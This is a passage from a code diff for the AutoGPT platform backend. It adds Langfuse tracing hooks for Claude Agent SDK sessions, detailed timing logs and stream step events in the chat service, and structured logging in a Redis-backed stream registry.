+            )
+
+        except Exception as e:
+            logger.warning(f"[Tracing] Failed to finalize trace: {e}")
+
+    def log_user_message(self, message: str) -> None:
+        """Log the user's input message."""
+        if not self.enabled or not self._trace:
+            return
+
+        self._user_message = message
+        try:
+            self._trace.update(input=message[:1000])
+        except Exception as e:
+            logger.debug(f"[Tracing] Failed to log user message: {e}")
+
+    def log_sdk_message(self, sdk_message: Message) -> None:
+        """Log an SDK message (automatically categorizes by type)."""
+        if not self.enabled:
+            return
+
+        try:
+            from claude_agent_sdk import (
+                AssistantMessage,
+                ResultMessage,
+                TextBlock,
+                ToolResultBlock,
+                ToolUseBlock,
+                UserMessage,
+            )
+
+            if isinstance(sdk_message, AssistantMessage):
+                # Start a new generation if needed
+                if self._current_generation is None:
+                    self._current_generation = GenerationSpan()
+                    self._generations.append(self._current_generation)
+
+                for block in sdk_message.content:
+                    if isinstance(block, TextBlock) and block.text:
+                        self._current_generation.text += block.text
+
+                    elif isinstance(block, ToolUseBlock):
+                        tool_span = ToolSpan(
+                            tool_call_id=block.id,
+                            tool_name=block.name,
+                            input=block.input or {},
+                        )
+                        self._pending_tools[block.id] = tool_span
+                        if self._current_generation:
+                            self._current_generation.tool_calls.append(tool_span)
+
+            elif isinstance(sdk_message, UserMessage):
+                # UserMessage carries tool results
+                content = sdk_message.content
+                blocks = content if isinstance(content, list) else []
+                for block in blocks:
+                    if isinstance(block, ToolResultBlock) and block.tool_use_id:
+                        tool_span = self._pending_tools.get(block.tool_use_id)
+                        if tool_span:
+                            tool_span.end_time = time.perf_counter()
+                            tool_span.success = not (block.is_error or False)
+                            tool_span.output = self._extract_tool_output(block.content)
+
+                # After tool results, finalize current generation
+                # (SDK will start a new AssistantMessage for continuation)
+                self._finalize_current_generation()
+
+            elif isinstance(sdk_message, ResultMessage):
+                self._log_result(sdk_message)
+
+        except Exception as e:
+            logger.debug(f"[Tracing] Failed to log SDK message: {e}")
+
+    def _log_result(self, result: ResultMessage) -> None:
+        """Log the final result with usage and cost."""
+        if not self.enabled or not self._trace:
+            return
+
+        try:
+            # Extract usage info
+            usage = result.usage or {}
+            metadata: dict[str, Any] = {
+                "duration_ms": result.duration_ms,
+                "duration_api_ms": result.duration_api_ms,
+                "num_turns": result.num_turns,
+                "is_error": result.is_error,
+            }
+
+            if result.total_cost_usd is not None:
+                metadata["cost_usd"] = result.total_cost_usd
+
+            if usage:
+                metadata["usage"] = usage
+
+            self._trace.update(metadata=metadata)
+
+            # Log as a generation for proper Langfuse cost/usage tracking
+            if usage or result.total_cost_usd:
+                self._trace.generation(
+                    name="claude-sdk-completion",
+                    model=self.model or "claude-sonnet-4-20250514",
+                    usage=(
+                        {
+                            "input": usage.get("input_tokens", 0),
+                            "output": usage.get("output_tokens", 0),
+                            "total": usage.get("input_tokens", 0)
+                            + usage.get("output_tokens", 0),
+                        }
+                        if usage
+                        else None
+                    ),
+                    metadata={"cost_usd": result.total_cost_usd},
+                )
+
+            logger.debug(
+                f"[Tracing] Logged result: {result.num_turns} turns, "
+                f"${result.total_cost_usd:.4f} cost"
+                if result.total_cost_usd
+                else f"[Tracing] Logged result: {result.num_turns} turns"
+            )
+
+        except Exception as e:
+            logger.debug(f"[Tracing] Failed to log result: {e}")
+
+    def _finalize_current_generation(self) -> None:
+        """Mark the current generation as complete."""
+        if self._current_generation:
+            self._current_generation.end_time = time.perf_counter()
+            self._current_generation = None
+
+    @staticmethod
+    def _extract_tool_output(content: str | list[dict[str, str]] | None) -> str:
+        """Extract string output from tool result content."""
+        if isinstance(content, str):
+            return content
+        if isinstance(content, list):
+            parts = [
+                item.get("text", "") for item in content if item.get("type") == "text"
+            ]
+            return "".join(parts) if parts else str(content)
+        return str(content) if content else ""
+
+
+@asynccontextmanager
+async def traced_session(
+    session_id: str,
+    user_id: str | None = None,
+    system_prompt: str | None = None,
+    model: str | None = None,
+):
+    """Convenience async context manager for tracing SDK sessions.
+
+    Usage:
+        async with traced_session(session_id, user_id) as tracer:
+            tracer.log_user_message(message)
+            async for msg in client.receive_messages():
+                tracer.log_sdk_message(msg)
+    """
+    tracer = TracedSession(session_id, user_id, system_prompt, model=model)
+    async with tracer:
+        yield tracer
+
+
+def create_tracing_hooks(tracer: TracedSession) -> dict[str, Any]:
+    """Create SDK hooks for fine-grained Langfuse tracing.
+
+    These hooks capture precise timing for tool executions and failures
+    that may not be visible in the message stream.
+
+    Designed to be merged with security hooks:
+        hooks = {**security_hooks, **create_tracing_hooks(tracer)}
+
+    Args:
+        tracer: The active TracedSession instance
+
+    Returns:
+        Hooks configuration dict for ClaudeAgentOptions
+    """
+    if not tracer.enabled:
+        return {}
+
+    try:
+        from claude_agent_sdk import HookMatcher
+        from claude_agent_sdk.types import HookContext, HookInput, SyncHookJSONOutput
+
+        async def trace_pre_tool_use(
+            input_data: HookInput,
+            tool_use_id: str | None,
+            context: HookContext,
+        ) -> SyncHookJSONOutput:
+            """Record tool start time for accurate duration tracking."""
+            _ = context
+            if not tool_use_id:
+                return {}
+            tool_name = str(input_data.get("tool_name", "unknown"))
+            tool_input = input_data.get("tool_input", {})
+
+            # Record start time in pending tools
+            tracer._pending_tools[tool_use_id] = ToolSpan(
+                tool_call_id=tool_use_id,
+                tool_name=tool_name,
+                input=tool_input if isinstance(tool_input, dict) else {},
+            )
+            return {}
+
+        async def trace_post_tool_use(
+            input_data: HookInput,
+            tool_use_id: str | None,
+            context: HookContext,
+        ) -> SyncHookJSONOutput:
+            """Record tool completion for duration calculation."""
+            _ = context
+            if tool_use_id and tool_use_id in tracer._pending_tools:
+                tracer._pending_tools[tool_use_id].end_time = time.perf_counter()
+                tracer._pending_tools[tool_use_id].success = True
+            return {}
+
+        async def trace_post_tool_failure(
+            input_data: HookInput,
+            tool_use_id: str | None,
+            context: HookContext,
+        ) -> SyncHookJSONOutput:
+            """Record tool failures for error tracking."""
+            _ = context
+            if tool_use_id and tool_use_id in tracer._pending_tools:
+                tracer._pending_tools[tool_use_id].end_time = time.perf_counter()
+                tracer._pending_tools[tool_use_id].success = False
+                error = input_data.get("error", "Unknown error")
+                tracer._pending_tools[tool_use_id].output = f"ERROR: {error}"
+            return {}
+
+        return {
+            "PreToolUse": [HookMatcher(matcher="*", hooks=[trace_pre_tool_use])],
+            "PostToolUse": [HookMatcher(matcher="*", hooks=[trace_post_tool_use])],
+            "PostToolUseFailure": [
+                HookMatcher(matcher="*", hooks=[trace_post_tool_failure])
+            ],
+        }
+
+    except ImportError:
+        logger.debug("[Tracing] SDK not available for hook-based tracing")
+        return {}
+
+
+def merge_hooks(*hook_dicts: dict[str, Any]) -> dict[str, Any]:
+    """Merge multiple hook configurations into one.
+
+    Combines hook matchers for the same event type, allowing both
+    security and tracing hooks to coexist.
+
+    Usage:
+        combined = merge_hooks(security_hooks, tracing_hooks)
+    """
+    result: dict[str, list[Any]] = {}
+    for hook_dict in hook_dicts:
+        for event_name, matchers in hook_dict.items():
+            if event_name not in result:
+                result[event_name] = []
+            result[event_name].extend(matchers)
+    return result
--- a/autogpt_platform/backend/backend/api/features/chat/service.py
+++ b/autogpt_platform/backend/backend/api/features/chat/service.py
@@ -52,8 +52,10 @@ from .response_model import (
    StreamBaseResponse,
    StreamError,
    StreamFinish,
+    StreamFinishStep,
    StreamHeartbeat,
    StreamStart,
+    StreamStartStep,
    StreamTextDelta,
    StreamTextEnd,
    StreamTextStart,
@@ -243,12 +245,16 @@ async def _get_system_prompt_template(context: str) -> str:
    return DEFAULT_SYSTEM_PROMPT.format(users_information=context)


-async def _build_system_prompt(user_id: str | None) -> tuple[str, Any]:
+async def _build_system_prompt(
+    user_id: str | None, has_conversation_history: bool = False
+) -> tuple[str, Any]:
    """Build the full system prompt including business understanding if available.

    Args:
-        user_id: The user ID for fetching business understanding
-                     If "default" and this is the user's first session, will use "onboarding" instead.
+        user_id: The user ID for fetching business understanding.
+        has_conversation_history: Whether there's existing conversation history.
+            If True, we don't tell the model to greet/introduce (since they're
+            already in a conversation).

    Returns:
        Tuple of (compiled prompt string, business understanding object)
@@ -264,6 +270,8 @@ async def _build_system_prompt(user_id: str | None) -> tuple[str, Any]:

    if understanding:
        context = format_understanding_for_prompt(understanding)
+    elif has_conversation_history:
+        context = "No prior understanding saved yet. Continue the existing conversation naturally."
    else:
        context = "This is the first time you are meeting the user. Greet them and introduce them to the platform"

@@ -351,6 +359,10 @@ async def stream_chat_completion(
    retry_count: int = 0,
    session: ChatSession | None = None,
    context: dict[str, str] | None = None,  # {url: str, content: str}
+    _continuation_message_id: (
+        str | None
+    ) = None,  # Internal: reuse message ID for tool call continuations
+    _task_id: str | None = None,  # Internal: task ID for SSE reconnection support
 ) -> AsyncGenerator[StreamBaseResponse, None]:
    """Main entry point for streaming chat completions with database handling.

@@ -368,24 +380,47 @@ async def stream_chat_completion(

    Raises:
        NotFoundError: If session_id is invalid
-        ValueError: If max_context_messages is exceeded

    """
+    completion_start = time.monotonic()
+
+    # Build log metadata for structured logging
+    log_meta = {"component": "ChatService", "session_id": session_id}
+    if user_id:
+        log_meta["user_id"] = user_id
+
    logger.info(
-        f"Streaming chat completion for session {session_id} for message {message} and user id {user_id}. Message is user message: {is_user_message}"
+        f"[TIMING] stream_chat_completion STARTED, session={session_id}, user={user_id}, "
+        f"message_len={len(message) if message else 0}, is_user={is_user_message}",
+        extra={
+            "json_fields": {
+                **log_meta,
+                "message_len": len(message) if message else 0,
+                "is_user_message": is_user_message,
+            }
+        },
    )

    # Only fetch from Redis if session not provided (initial call)
    if session is None:
+        fetch_start = time.monotonic()
        session = await get_chat_session(session_id, user_id)
+        fetch_time = (time.monotonic() - fetch_start) * 1000
        logger.info(
-            f"Fetched session from Redis: {session.session_id if session else 'None'}, "
-            f"message_count={len(session.messages) if session else 0}"
+            f"[TIMING] get_chat_session took {fetch_time:.1f}ms, "
+            f"n_messages={len(session.messages) if session else 0}",
+            extra={
+                "json_fields": {
+                    **log_meta,
+                    "duration_ms": fetch_time,
+                    "n_messages": len(session.messages) if session else 0,
+                }
+            },
        )
    else:
        logger.info(
-            f"Using provided session object: {session.session_id}, "
-            f"message_count={len(session.messages)}"
+            f"[TIMING] Using provided session, messages={len(session.messages)}",
+            extra={"json_fields": {**log_meta, "n_messages": len(session.messages)}},
        )

    if not session:
@@ -406,23 +441,32 @@ async def stream_chat_completion(

        # Track user message in PostHog
        if is_user_message:
+            posthog_start = time.monotonic()
            track_user_message(
                user_id=user_id,
                session_id=session_id,
                message_length=len(message),
            )
+            posthog_time = (time.monotonic() - posthog_start) * 1000
+            logger.info(
+                f"[TIMING] track_user_message took {posthog_time:.1f}ms",
+                extra={"json_fields": {**log_meta, "duration_ms": posthog_time}},
+            )

-    logger.info(
-        f"Upserting session: {session.session_id} with user id {session.user_id}, "
-        f"message_count={len(session.messages)}"
-    )
+    upsert_start = time.monotonic()
    session = await upsert_chat_session(session)
+    upsert_time = (time.monotonic() - upsert_start) * 1000
+    logger.info(
+        f"[TIMING] upsert_chat_session took {upsert_time:.1f}ms",
+        extra={"json_fields": {**log_meta, "duration_ms": upsert_time}},
+    )
    assert session, "Session not found"

    # Generate title for new sessions on first user message (non-blocking)
    # Check: is_user_message, no title yet, and this is the first user message
-    if is_user_message and message and not session.title:
-        user_messages = [m for m in session.messages if m.role == "user"]
+    user_messages = [m for m in session.messages if m.role == "user"]
+    first_user_msg = message or (user_messages[0].content if user_messages else None)
+    if is_user_message and first_user_msg and not session.title:
        if len(user_messages) == 1:
            # First user message - generate title in background
            import asyncio
@@ -430,7 +474,7 @@ async def stream_chat_completion(
            # Capture only the values we need (not the session object) to avoid
            # stale data issues when the main flow modifies the session
            captured_session_id = session_id
-            captured_message = message
+            captured_message = first_user_msg
            captured_user_id = user_id

            async def _update_title():
@@ -454,7 +498,13 @@ async def stream_chat_completion(
            asyncio.create_task(_update_title())

    # Build system prompt with business understanding
+    prompt_start = time.monotonic()
    system_prompt, understanding = await _build_system_prompt(user_id)
+    prompt_time = (time.monotonic() - prompt_start) * 1000
+    logger.info(
+        f"[TIMING] _build_system_prompt took {prompt_time:.1f}ms",
+        extra={"json_fields": {**log_meta, "duration_ms": prompt_time}},
+    )

    # Initialize variables for streaming
    assistant_response = ChatMessage(
@@ -479,13 +529,27 @@ async def stream_chat_completion(
    # Generate unique IDs for AI SDK protocol
    import uuid as uuid_module

-    message_id = str(uuid_module.uuid4())
+    is_continuation = _continuation_message_id is not None
+    message_id = _continuation_message_id or str(uuid_module.uuid4())
    text_block_id = str(uuid_module.uuid4())

-    # Yield message start
-    yield StreamStart(messageId=message_id)
+    # Only yield message start for the initial call, not for continuations.
+    setup_time = (time.monotonic() - completion_start) * 1000
+    logger.info(
+        f"[TIMING] Setup complete, yielding StreamStart at {setup_time:.1f}ms",
+        extra={"json_fields": {**log_meta, "setup_time_ms": setup_time}},
+    )
+    if not is_continuation:
+        yield StreamStart(messageId=message_id, taskId=_task_id)
+
+    # Emit start-step before each LLM call (AI SDK uses this to add step boundaries)
+    yield StreamStartStep()

    try:
+        logger.info(
+            "[TIMING] Calling _stream_chat_chunks",
+            extra={"json_fields": log_meta},
+        )
        async for chunk in _stream_chat_chunks(
            session=session,
            tools=tools,
@@ -585,6 +649,10 @@ async def stream_chat_completion(
                    )
                yield chunk
            elif isinstance(chunk, StreamFinish):
+                if has_done_tool_call:
+                    # Tool calls happened — close the step but don't send message-level finish.
+                    # The continuation will open a new step, and finish will come at the end.
+                    yield StreamFinishStep()
                if not has_done_tool_call:
                    # Emit text-end before finish if we received text but haven't closed it
                    if has_received_text and not text_streaming_ended:
@@ -616,6 +684,8 @@ async def stream_chat_completion(
                            has_saved_assistant_message = True

                    has_yielded_end = True
+                    # Emit finish-step before finish (resets AI SDK text/reasoning state)
+                    yield StreamFinishStep()
                    yield chunk
            elif isinstance(chunk, StreamError):
                has_yielded_error = True
@@ -665,6 +735,10 @@ async def stream_chat_completion(
            logger.info(
                f"Retryable error encountered. Attempt {retry_count + 1}/{config.max_retries}"
            )
+            # Close the current step before retrying so the recursive call's
+            # StreamStartStep doesn't produce unbalanced step events.
+            if not has_yielded_end:
+                yield StreamFinishStep()
            should_retry = True
        else:
            # Non-retryable error or max retries exceeded
@@ -700,6 +774,7 @@ async def stream_chat_completion(
                error_response = StreamError(errorText=error_message)
                yield error_response
            if not has_yielded_end:
+                yield StreamFinishStep()
                yield StreamFinish()
            return

@@ -714,6 +789,8 @@ async def stream_chat_completion(
            retry_count=retry_count + 1,
            session=session,
            context=context,
+            _continuation_message_id=message_id,  # Reuse message ID since start was already sent
+            _task_id=_task_id,
        ):
            yield chunk
        return  # Exit after retry to avoid double-saving in finally block
@@ -783,6 +860,8 @@ async def stream_chat_completion(
            session=session,  # Pass session object to avoid Redis refetch
            context=context,
            tool_call_response=str(tool_response_messages),
+            _continuation_message_id=message_id,  # Reuse message ID to avoid duplicates
+            _task_id=_task_id,
        ):
            yield chunk

@@ -893,9 +972,21 @@ async def _stream_chat_chunks(
        SSE formatted JSON response objects

    """
+    import time as time_module
+
+    stream_chunks_start = time_module.perf_counter()
    model = config.model

-    logger.info("Starting pure chat stream")
+    # Build log metadata for structured logging
+    log_meta = {"component": "ChatService", "session_id": session.session_id}
+    if session.user_id:
+        log_meta["user_id"] = session.user_id
+
+    logger.info(
+        f"[TIMING] _stream_chat_chunks STARTED, session={session.session_id}, "
+        f"user={session.user_id}, n_messages={len(session.messages)}",
+        extra={"json_fields": {**log_meta, "n_messages": len(session.messages)}},
+    )

    messages = session.to_openai_messages()
    if system_prompt:
@@ -906,12 +997,18 @@ async def _stream_chat_chunks(
        messages = [system_message] + messages

    # Apply context window management
+    context_start = time_module.perf_counter()
    context_result = await _manage_context_window(
        messages=messages,
        model=model,
        api_key=config.api_key,
        base_url=config.base_url,
    )
+    context_time = (time_module.perf_counter() - context_start) * 1000
+    logger.info(
+        f"[TIMING] _manage_context_window took {context_time:.1f}ms",
+        extra={"json_fields": {**log_meta, "duration_ms": context_time}},
+    )

    if context_result.error:
        if "System prompt dropped" in context_result.error:
@@ -946,9 +1043,19 @@ async def _stream_chat_chunks(

        while retry_count <= MAX_RETRIES:
            try:
+                elapsed = (time_module.perf_counter() - stream_chunks_start) * 1000
+                retry_info = (
+                    f" (retry {retry_count}/{MAX_RETRIES})" if retry_count > 0 else ""
+                )
                logger.info(
-                    f"Creating OpenAI chat completion stream..."
-                    f"{f' (retry {retry_count}/{MAX_RETRIES})' if retry_count > 0 else ''}"
+                    f"[TIMING] Creating OpenAI stream at {elapsed:.1f}ms{retry_info}",
+                    extra={
+                        "json_fields": {
+                            **log_meta,
+                            "elapsed_ms": elapsed,
+                            "retry_count": retry_count,
+                        }
+                    },
                )

                # Build extra_body for OpenRouter tracing and PostHog analytics
@@ -965,6 +1072,11 @@ async def _stream_chat_chunks(
                        :128
                    ]  # OpenRouter limit

+                # Enable adaptive thinking for Anthropic models via OpenRouter
+                if config.thinking_enabled and "anthropic" in model.lower():
+                    extra_body["reasoning"] = {"enabled": True}
+
+                api_call_start = time_module.perf_counter()
                stream = await client.chat.completions.create(
                    model=model,
                    messages=cast(list[ChatCompletionMessageParam], messages),
@@ -974,6 +1086,11 @@ async def _stream_chat_chunks(
                    stream_options=ChatCompletionStreamOptionsParam(include_usage=True),
                    extra_body=extra_body,
                )
+                api_init_time = (time_module.perf_counter() - api_call_start) * 1000
+                logger.info(
+                    f"[TIMING] OpenAI stream object returned in {api_init_time:.1f}ms",
+                    extra={"json_fields": {**log_meta, "duration_ms": api_init_time}},
+                )

                # Variables to accumulate tool calls
                tool_calls: list[dict[str, Any]] = []
@@ -984,10 +1101,13 @@ async def _stream_chat_chunks(

                # Track if we've started the text block
                text_started = False
+                first_content_chunk = True
+                chunk_count = 0

                # Process the stream
                chunk: ChatCompletionChunk
                async for chunk in stream:
+                    chunk_count += 1
                    if chunk.usage:
                        yield StreamUsage(
                            promptTokens=chunk.usage.prompt_tokens,
@@ -1010,6 +1130,23 @@ async def _stream_chat_chunks(
                            if not text_started and text_block_id:
                                yield StreamTextStart(id=text_block_id)
                                text_started = True
+                            # Log timing for first content chunk
+                            if first_content_chunk:
+                                first_content_chunk = False
+                                ttfc = (
+                                    time_module.perf_counter() - api_call_start
+                                ) * 1000
+                                logger.info(
+                                    f"[TIMING] FIRST CONTENT CHUNK at {ttfc:.1f}ms "
+                                    f"(since API call), n_chunks={chunk_count}",
+                                    extra={
+                                        "json_fields": {
+                                            **log_meta,
+                                            "time_to_first_chunk_ms": ttfc,
+                                            "n_chunks": chunk_count,
+                                        }
+                                    },
+                                )
                            # Stream the text delta
                            text_response = StreamTextDelta(
                                id=text_block_id or "",
@@ -1066,7 +1203,21 @@ async def _stream_chat_chunks(
                                        toolName=tool_calls[idx]["function"]["name"],
                                    )
                                    emitted_start_for_idx.add(idx)
-                logger.info(f"Stream complete. Finish reason: {finish_reason}")
+                stream_duration = time_module.perf_counter() - api_call_start
+                logger.info(
+                    f"[TIMING] OpenAI stream COMPLETE, finish_reason={finish_reason}, "
+                    f"duration={stream_duration:.2f}s, "
+                    f"n_chunks={chunk_count}, n_tool_calls={len(tool_calls)}",
+                    extra={
+                        "json_fields": {
+                            **log_meta,
+                            "stream_duration_ms": stream_duration * 1000,
+                            "finish_reason": finish_reason,
+                            "n_chunks": chunk_count,
+                            "n_tool_calls": len(tool_calls),
+                        }
+                    },
+                )

                # Yield all accumulated tool calls after the stream is complete
                # This ensures all tool call arguments have been fully received
@@ -1086,6 +1237,12 @@ async def _stream_chat_chunks(
                        # Re-raise to trigger retry logic in the parent function
                        raise

+                total_time = (time_module.perf_counter() - stream_chunks_start) * 1000
+                logger.info(
+                    f"[TIMING] _stream_chat_chunks COMPLETED in {total_time / 1000:.1f}s; "
+                    f"session={session.session_id}, user={session.user_id}",
+                    extra={"json_fields": {**log_meta, "total_time_ms": total_time}},
+                )
                yield StreamFinish()
                return
            except Exception as e:
@@ -1565,6 +1722,7 @@ async def _execute_long_running_tool_with_streaming(
            task_id,
            StreamError(errorText=str(e)),
        )
+        await stream_registry.publish_chunk(task_id, StreamFinishStep())
        await stream_registry.publish_chunk(task_id, StreamFinish())

        await _update_pending_operation(
@@ -1681,6 +1839,10 @@ async def _generate_llm_continuation(
        if session_id:
            extra_body["session_id"] = session_id[:128]

+        # Enable adaptive thinking for Anthropic models via OpenRouter
+        if config.thinking_enabled and "anthropic" in config.model.lower():
+            extra_body["reasoning"] = {"enabled": True}
+
        retry_count = 0
        last_error: Exception | None = None
        response = None
@@ -1811,6 +1973,10 @@ async def _generate_llm_continuation_with_streaming(
        if session_id:
            extra_body["session_id"] = session_id[:128]

+        # Enable adaptive thinking for Anthropic models via OpenRouter
+        if config.thinking_enabled and "anthropic" in config.model.lower():
+            extra_body["reasoning"] = {"enabled": True}
+
        # Make streaming LLM call (no tools - just text response)
        from typing import cast

@@ -1822,6 +1988,7 @@ async def _generate_llm_continuation_with_streaming(

        # Publish start event
        await stream_registry.publish_chunk(task_id, StreamStart(messageId=message_id))
+        await stream_registry.publish_chunk(task_id, StreamStartStep())
        await stream_registry.publish_chunk(task_id, StreamTextStart(id=text_block_id))

        # Stream the response
@@ -1845,6 +2012,7 @@ async def _generate_llm_continuation_with_streaming(

        # Publish end events
        await stream_registry.publish_chunk(task_id, StreamTextEnd(id=text_block_id))
+        await stream_registry.publish_chunk(task_id, StreamFinishStep())

        if assistant_content:
            # Reload session from DB to avoid race condition with user messages
@@ -1886,4 +2054,5 @@ async def _generate_llm_continuation_with_streaming(
            task_id,
            StreamError(errorText=f"Failed to generate response: {e}"),
        )
+        await stream_registry.publish_chunk(task_id, StreamFinishStep())
        await stream_registry.publish_chunk(task_id, StreamFinish())
--- a/autogpt_platform/backend/backend/api/features/chat/stream_registry.py
+++ b/autogpt_platform/backend/backend/api/features/chat/stream_registry.py
@@ -104,6 +104,24 @@ async def create_task(
    Returns:
        The created ActiveTask instance (metadata only)
    """
+    import time
+
+    start_time = time.perf_counter()
+
+    # Build log metadata for structured logging
+    log_meta = {
+        "component": "StreamRegistry",
+        "task_id": task_id,
+        "session_id": session_id,
+    }
+    if user_id:
+        log_meta["user_id"] = user_id
+
+    logger.info(
+        f"[TIMING] create_task STARTED, task={task_id}, session={session_id}, user={user_id}",
+        extra={"json_fields": log_meta},
+    )
+
    task = ActiveTask(
        task_id=task_id,
        session_id=session_id,
@@ -114,10 +132,18 @@ async def create_task(
    )

    # Store metadata in Redis
+    redis_start = time.perf_counter()
    redis = await get_redis_async()
+    redis_time = (time.perf_counter() - redis_start) * 1000
+    logger.info(
+        f"[TIMING] get_redis_async took {redis_time:.1f}ms",
+        extra={"json_fields": {**log_meta, "duration_ms": redis_time}},
+    )
+
    meta_key = _get_task_meta_key(task_id)
    op_key = _get_operation_mapping_key(operation_id)

+    hset_start = time.perf_counter()
    await redis.hset(  # type: ignore[misc]
        meta_key,
        mapping={
@@ -131,12 +157,22 @@ async def create_task(
            "created_at": task.created_at.isoformat(),
        },
    )
+    hset_time = (time.perf_counter() - hset_start) * 1000
+    logger.info(
+        f"[TIMING] redis.hset took {hset_time:.1f}ms",
+        extra={"json_fields": {**log_meta, "duration_ms": hset_time}},
+    )
+
    await redis.expire(meta_key, config.stream_ttl)

    # Create operation_id -> task_id mapping for webhook lookups
    await redis.set(op_key, task_id, ex=config.stream_ttl)

-    logger.debug(f"Created task {task_id} for session {session_id}")
+    total_time = (time.perf_counter() - start_time) * 1000
+    logger.info(
+        f"[TIMING] create_task COMPLETED in {total_time:.1f}ms; task={task_id}, session={session_id}",
+        extra={"json_fields": {**log_meta, "total_time_ms": total_time}},
+    )

    return task

@@ -156,26 +192,60 @@ async def publish_chunk(
    Returns:
        The Redis Stream message ID
    """
+    import time
+
+    start_time = time.perf_counter()
+    chunk_type = type(chunk).__name__
    chunk_json = chunk.model_dump_json()
    message_id = "0-0"

+    # Build log metadata
+    log_meta = {
+        "component": "StreamRegistry",
+        "task_id": task_id,
+        "chunk_type": chunk_type,
+    }
+
    try:
        redis = await get_redis_async()
        stream_key = _get_task_stream_key(task_id)

        # Write to Redis Stream for persistence and real-time delivery
+        xadd_start = time.perf_counter()
        raw_id = await redis.xadd(
            stream_key,
            {"data": chunk_json},
            maxlen=config.stream_max_length,
        )
+        xadd_time = (time.perf_counter() - xadd_start) * 1000
        message_id = raw_id if isinstance(raw_id, str) else raw_id.decode()

        # Set TTL on stream to match task metadata TTL
        await redis.expire(stream_key, config.stream_ttl)
+
+        total_time = (time.perf_counter() - start_time) * 1000
+        # Only log timing for significant chunks or slow operations
+        if (
+            chunk_type
+            in ("StreamStart", "StreamFinish", "StreamTextStart", "StreamTextEnd")
+            or total_time > 50
+        ):
+            logger.info(
+                f"[TIMING] publish_chunk {chunk_type} in {total_time:.1f}ms (xadd={xadd_time:.1f}ms)",
+                extra={
+                    "json_fields": {
+                        **log_meta,
+                        "total_time_ms": total_time,
+                        "xadd_time_ms": xadd_time,
+                        "message_id": message_id,
+                    }
+                },
+            )
    except Exception as e:
+        elapsed = (time.perf_counter() - start_time) * 1000
        logger.error(
-            f"Failed to publish chunk for task {task_id}: {e}",
+            f"[TIMING] Failed to publish chunk {chunk_type} after {elapsed:.1f}ms: {e}",
+            extra={"json_fields": {**log_meta, "elapsed_ms": elapsed, "error": str(e)}},
            exc_info=True,
        )

@@ -200,24 +270,61 @@ async def subscribe_to_task(
        An asyncio Queue that will receive stream chunks, or None if task not found
        or user doesn't have access
    """
+    import time
+
+    start_time = time.perf_counter()
+
+    # Build log metadata
+    log_meta = {"component": "StreamRegistry", "task_id": task_id}
+    if user_id:
+        log_meta["user_id"] = user_id
+
+    logger.info(
+        f"[TIMING] subscribe_to_task STARTED, task={task_id}, user={user_id}, last_msg={last_message_id}",
+        extra={"json_fields": {**log_meta, "last_message_id": last_message_id}},
+    )
+
+    redis_start = time.perf_counter()
    redis = await get_redis_async()
    meta_key = _get_task_meta_key(task_id)
    meta: dict[Any, Any] = await redis.hgetall(meta_key)  # type: ignore[misc]
+    hgetall_time = (time.perf_counter() - redis_start) * 1000
+    logger.info(
+        f"[TIMING] Redis hgetall took {hgetall_time:.1f}ms",
+        extra={"json_fields": {**log_meta, "duration_ms": hgetall_time}},
+    )

    if not meta:
-        logger.debug(f"Task {task_id} not found in Redis")
+        elapsed = (time.perf_counter() - start_time) * 1000
+        logger.info(
+            f"[TIMING] Task not found in Redis after {elapsed:.1f}ms",
+            extra={
+                "json_fields": {
+                    **log_meta,
+                    "elapsed_ms": elapsed,
+                    "reason": "task_not_found",
+                }
+            },
+        )
        return None

    # Note: Redis client uses decode_responses=True, so keys are strings
    task_status = meta.get("status", "")
    task_user_id = meta.get("user_id", "") or None
+    log_meta["session_id"] = meta.get("session_id", "")

    # Validate ownership - if task has an owner, requester must match
    if task_user_id:
        if user_id != task_user_id:
            logger.warning(
-                f"User {user_id} denied access to task {task_id} "
-                f"owned by {task_user_id}"
+                f"[TIMING] Access denied: user {user_id} tried to access task owned by {task_user_id}",
+                extra={
+                    "json_fields": {
+                        **log_meta,
+                        "task_owner": task_user_id,
+                        "reason": "access_denied",
+                    }
+                },
            )
            return None

@@ -225,7 +332,19 @@ async def subscribe_to_task(
    stream_key = _get_task_stream_key(task_id)

    # Step 1: Replay messages from Redis Stream
+    xread_start = time.perf_counter()
    messages = await redis.xread({stream_key: last_message_id}, block=0, count=1000)
+    xread_time = (time.perf_counter() - xread_start) * 1000
+    logger.info(
+        f"[TIMING] Redis xread (replay) took {xread_time:.1f}ms, status={task_status}",
+        extra={
+            "json_fields": {
+                **log_meta,
+                "duration_ms": xread_time,
+                "task_status": task_status,
+            }
+        },
+    )

    replayed_count = 0
    replay_last_id = last_message_id
@@ -244,19 +363,48 @@ async def subscribe_to_task(
                    except Exception as e:
                        logger.warning(f"Failed to replay message: {e}")

-    logger.debug(f"Task {task_id}: replayed {replayed_count} messages")
+    logger.info(
+        f"[TIMING] Replayed {replayed_count} messages, last_id={replay_last_id}",
+        extra={
+            "json_fields": {
+                **log_meta,
+                "n_messages_replayed": replayed_count,
+                "replay_last_id": replay_last_id,
+            }
+        },
+    )

    # Step 2: If task is still running, start stream listener for live updates
    if task_status == "running":
+        logger.info(
+            "[TIMING] Task still running, starting _stream_listener",
+            extra={"json_fields": {**log_meta, "task_status": task_status}},
+        )
        listener_task = asyncio.create_task(
-            _stream_listener(task_id, subscriber_queue, replay_last_id)
+            _stream_listener(task_id, subscriber_queue, replay_last_id, log_meta)
        )
        # Track listener task for cleanup on unsubscribe
        _listener_tasks[id(subscriber_queue)] = (task_id, listener_task)
    else:
        # Task is completed/failed - add finish marker
+        logger.info(
+            f"[TIMING] Task already {task_status}, adding StreamFinish",
+            extra={"json_fields": {**log_meta, "task_status": task_status}},
+        )
        await subscriber_queue.put(StreamFinish())

+    total_time = (time.perf_counter() - start_time) * 1000
+    logger.info(
+        f"[TIMING] subscribe_to_task COMPLETED in {total_time:.1f}ms; task={task_id}, "
+        f"n_messages_replayed={replayed_count}",
+        extra={
+            "json_fields": {
+                **log_meta,
+                "total_time_ms": total_time,
+                "n_messages_replayed": replayed_count,
+            }
+        },
+    )
    return subscriber_queue


@@ -264,6 +412,7 @@ async def _stream_listener(
    task_id: str,
    subscriber_queue: asyncio.Queue[StreamBaseResponse],
    last_replayed_id: str,
+    log_meta: dict | None = None,
 ) -> None:
    """Listen to Redis Stream for new messages using blocking XREAD.

@@ -274,10 +423,27 @@ async def _stream_listener(
        task_id: Task ID to listen for
        subscriber_queue: Queue to deliver messages to
        last_replayed_id: Last message ID from replay (continue from here)
+        log_meta: Structured logging metadata
    """
+    import time
+
+    start_time = time.perf_counter()
+
+    # Use provided log_meta or build minimal one
+    if log_meta is None:
